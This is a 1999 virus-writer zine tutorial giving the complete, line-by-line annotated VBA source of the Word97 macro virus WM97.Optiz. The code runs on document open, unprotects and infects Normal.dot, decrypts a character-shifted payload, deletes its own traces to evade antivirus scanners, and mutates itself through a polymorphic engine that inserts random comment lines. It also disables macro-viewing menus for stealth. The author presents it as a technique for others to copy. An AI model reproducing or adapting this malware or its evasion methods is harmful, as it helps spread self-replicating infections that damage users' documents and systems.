<-------------------------//LineZer0 Network 99\\------------------------->
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


~Word97Macro.Optiz~
===================

Identification:
~~~~~~~~~~~~~~~

	~Virusname: 	WM97.Optiz
	~Size:		44.544 Bytes ( 8 Macros | 1 Modul )
	~Version:	D
	~Origin:  	Austria
	~Author:	jack twoflower / [LineZer0 & Metaphase]
	~Date:		April, 1999

Features:
~~~~~~~~~

	~Application	Word97	
	~Payload: 	Yes, just a little message
	~Stealth: 	Yes
	~Retro: 	Nope
	~SR-1 comp.: 	Yes
	~Polymorph:	Yes, a changed APMRS
	~Encrypted: 	Yes


    Hi folks, this is the first Word97Macro virus which uses this kind of
encryption. This tech was invented by Nightmare Joker of SOS and used in
Word6 macros. I found some old tutorial about encryption and tried to use
this tech in Word97. You can take a look at the result here! A big hug to
Nightmare Joker!

> This is a comment ;)

------------------------------[Code starts here]---------------------------


Public Const ModulName = "Office_"

> Set a constant for the modul name, cause this name won't change

Public Active_ As Object
Public Normal_ As Object
Public CodeHost_ As Object
Public Skip As Boolean

> Declare the variables. The two first object variables are used to infect
> and the third is used for inserting the virulant code into the main virus
> body. The boolean variable 'Skip' is used for check if the active doc 
> needs to be saved

Sub AutoOpen()
On Error Resume Next
Drop

> Call the routine 'Drop' which decrypts the code and inserts it

End Sub

Sub Drop()
Rem A lot of thanx to Nightmare Joker for this tech!!!
On Error Resume Next
Dim Jack(28) As String

SetAttr NormalTemplate.FullName, vbNormal

> Unprotect the template

> Declare the arrays

Jack(1) = "l‹=bŒ=o‚’Š‚=k‚•‘"
Jack(2) = "p‚‘=^€‘†“‚|=Z=^€‘†“‚aŒ€’Š‚‹‘Ks_mŒ‡‚€‘Ks_`ŒŠŒ‹‚‹‘"
Jack(3) = "p‚‘=kŒŠ~‰|=Z=kŒŠ~‰q‚Š‰~‘‚Ks_mŒ‡‚€‘Ks_`ŒŠŒ‹‚‹‘"
Jack(4) = "^‰†€~‘†Œ‹Ka†‰~–^‰‚‘=Z=”^‰‚‘kŒ‹‚"
Jack(5) = "`ŒŠŠ~‹_~E?s†‚”?FK`Œ‹‘Œ‰ESFKb‹~‰‚=Z=c~‰‚"
Jack(6) = "`ŒŠŠ~‹_~E?cŒŠ~‘?FK`Œ‹‘Œ‰ENOFKb‹~‰‚=Z=c~‰‚"
Jack(7) = "`ŒŠŠ~‹_~E?qŒŒ‰?FK`Œ‹‘Œ‰ENOFKb‹~‰‚=Z=c~‰‚"
Jack(8) = "`ŒŠŠ~‹_~E?qŒŒ‰?FK`Œ‹‘Œ‰ENPFKb‹~‰‚=Z=c~‰‚"
Jack(9) = "`ŒŠŠ~‹_~E?qŒŒ‰?FK`Œ‹‘Œ‰ENQFKb‹~‰‚=Z=c~‰‚"
Jack(10) = "l‘†Œ‹Ks†’mŒ‘‚€‘†Œ‹=Z=c~‰‚"
Jack(11) = "l‘†Œ‹Kp~“‚kŒŠ~‰mŒŠ‘=Z=c~‰‚"
Jack(12) = "l‘†Œ‹K^‰‰Œ”c~‘p~“‚=Z=c~‰‚"
Jack(13) = "a~‘~=Z=?€Wy”†‹VRK–?"
Jack(14) = "^‰†€~‘†Œ‹Ks_bK^€‘†“‚s_mŒ‡‚€‘Ks_`ŒŠŒ‹‚‹‘EjŒ’‰k~Š‚FKb•Œ‘=a~‘~"
Jack(15) = "^€‘†“‚f‹=Z=c~‰‚"
Jack(16) = "kŒŠ~‰f‹=Z=c~‰‚"
Jack(17) = "cŒ=†=Z=N=qŒ=kŒŠ~‰|K`Œ’‹‘"
Jack(18) = "fƒ=kŒŠ~‰|E†FKk~Š‚=Z=jŒ’‰k~Š‚=q…‚‹=kŒŠ~‰f‹=Z=q’‚"
Jack(19) = "k‚•‘"
Jack(20) = "cŒ=†=Z=N=qŒ=^€‘†“‚|K`Œ’‹‘"
Jack(21) = "fƒ=^€‘†“‚|E†FKk~Š‚=Z=jŒ’‰k~Š‚=q…‚‹=^€‘†“‚f‹=Z=q’‚"
Jack(22) = "k‚•‘"
Jack(23) = "fƒ=kŒŠ~‰f‹=Z=c~‰‚=q…‚‹=kŒŠ~‰|KfŠŒ‘=a~‘~"
Jack(24) = "fƒ=^€‘†“‚f‹=Z=c~‰‚=q…‚‹"
Jack(25) = "^€‘†“‚|KfŠŒ‘=a~‘~"
Jack(26) = "pˆ†=Z=q’‚"
Jack(27) = "b‹=fƒ"
Jack(28) = "fƒ=eŒ’EkŒ”EFF=Z=f‹‘Eo‹=G=OQF=q…‚‹=j„_Œ•=?d‚‚‘—=‘ŒW?=C=“`=C=“`=C=?››H=i†‹‚w‚õ=k‚‘”Œˆ?=C=“`=C=?››H=h‹Œ”‚‘…=C=j‚‘~…~‚?=C=“`=C=?››H=`‰~’=C=r‰‘†Š~‘‚=`…~Œ?=C=“`=C=?››H=k†„…‘Š~‚=gŒˆ‚?I=SQI=?tVTjKl‘†—=™=–=g~€ˆ=q”Œƒ‰Œ”‚Li†‹‚w‚õ=s•=q‚~Š?"

> This are the arrays with the encrypted code in it. Every array stores one
> line of original virulant code

For i = 1 To 28
    ECode = ECode & DeCode(Jack(i))
Next i

> Here we generate a loop 1 to 28, because we have 28 arrays. This here de-
> crypts the arrays. We call an under function which is called 'DeCode'.
> This function reads out each sign of each array and decrypt it. Do the
> loop till we have encrypt also the last array.

Set CodeHost_ = Application.VBE.ActiveVBProject.VBComponents(ModulName).CodeModule

> Here we set the host for our virulant code. If this whole code is stored
> in a document, the code will be inserted in the document. If the host is
> the Normal.dot then this is the host.

For o = 1 To CodeHost_.CountOfLines
    If Left(CodeHost_.Lines(o, 1), 9) = Chr(83) + Chr(117) + Chr(98) _
       + Chr(32) + Chr(79) + Chr(112) + Chr(116) + Chr(105) + Chr(122) Then
        TheLine = o + 1
        Exit For
    End If
Next o

> This here is one of the important things, coz without this the code would
> destroy itself. Here we want to find the right line to insert our virus
> code, so we search for the line where 'Sub Optiz()' is. We add one to 
> this line, coz we insert the code below.

CodeHost_.InsertLines TheLine, ECode

> Insert the decrypted code with this command into the right line

Optiz

> Run the virulant code ;)

CodeHost_.DeleteLines TheLine, 29

> Delete the virulant code again. Otherwise the code would stay and got de-
> tected by AV scanners. The code is deleted in our host

If Skip = False Then
    NormalTemplate.VBProject.VBComponents(ModulName) _
     .CodeModule.DeleteLines TheLine, 29
Else
    ActiveDocument.VBProject.VBComponents(ModulName) _
     .CodeModule.DeleteLines TheLine, 29
    ActiveDocument.SaveAs ActiveDocument.FullName
End If

> The variable 'Skip' is set in the encrypted code so if it is false we 
> infected a Normal.dot and have to delete the virulant code also there.
> If it is true, we infected a document and delete the virulant code there

> These next lines are the polymorphic engine 
> It's a changed version of Pyro's APMRS. Thanks Pyro!

PolySize = Int(Rnd * 10)

> Set the size of the changes in code

For PolyMorphic = 1 To PolySize

> Generate a loop from 1 to the integer 'PolySize'

    PolyString = ""

> Clear the contents of the string 'PolyString'

    PolyLines = CodeHost_.CountOfLines

> Insert the actual number of lines in the host modul into the integer
> 'PolyLines'

    RndLine = Int(Rnd * PolyLines)

> Set the line where we insert the new line

    StringSize = Int(Rnd * 39) + 1

> Set the length of the inserted line

    For SomeString = 1 To StringSize
        PolyString = PolyString & Chr(65 + Int(Rnd * 22)) _
                       & Chr(122 - Int(Rnd * 22))
    Next SomeString

> Set the contents of the inserted line
    
    CodeHost_.InsertLines RndLine, "Rem " & PolyString

> Now insert the lines into our hostmodul

Next PolyMorphic

> Do the loop or 'play it again Sam!'

End Sub

Sub Optiz()

> Here our virulant code will be inserted

End Sub

Sub ToolsMacro()
End Sub
Sub ViewCode()
End Sub
Sub ViewVBCode()
End Sub
Sub ToolsCustomize()
End Sub
Sub FileTemplates()
End Sub

> This is just the stealth...old tricks

Public Function DeCode(Code As String)

> Here we have the most important part of the virus...let's called it 'the
> brain'. Without this the virus would screw up!

    For xy = 1 To Len(Code)

> Generate a loop from 1 to the leng of the actual array with is decrypted

        Ascii = Asc(Mid(Code, xy, 1))

> Get the current ascii value of the actual sign

        Change = Ascii - 29

> and substract 29 from it. This is the main encryption. NJoker says it's
> lack, but I think it helps to be unscannable ;)

        NewCode = NewCode & Chr(Change)

> Insert now the decrypted sign into the string 'NewCode'

    Next

> Go back to the next sign in the array
    
    DeCode = NewCode & vbCr

> Insert the complet decrypted array into the string 'DeCode' and add 
> vbCr

End Function

'   W97M.Optiz.D
'   ============

'    Greetz to:
'    ~~+ LineZer0 Network
'    ~~+ Metaphase
'    ~~+ Nightmare Joker
'    ~~+ Knowdeth
'    ~~+ Clau[UC]
'    ~~+ Tally and SlageHammer
'    ~~+ All austrian vx coders; plz contact me!
'    ~~+ VicodinES

> This are some greetz in the main virus code.

----------------------------[code ends here]-------------------------------


    So this was a new kind of Word97 encryption. I think it's the first one
which uses this tech in Word97. If you don't understand something read the
original tutorial by Nightmare Joker or mine called 'How to hide your macro
virus from F/Win32'. There are two ways of encryption explained. Ok, thanks
for taking time and reading this tutorial. If you have any comments or some
questions feel free and mail me!

Thanx a lot

							 jack twoflower

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<-------------------------\\LineZer0 Network 99//------------------------->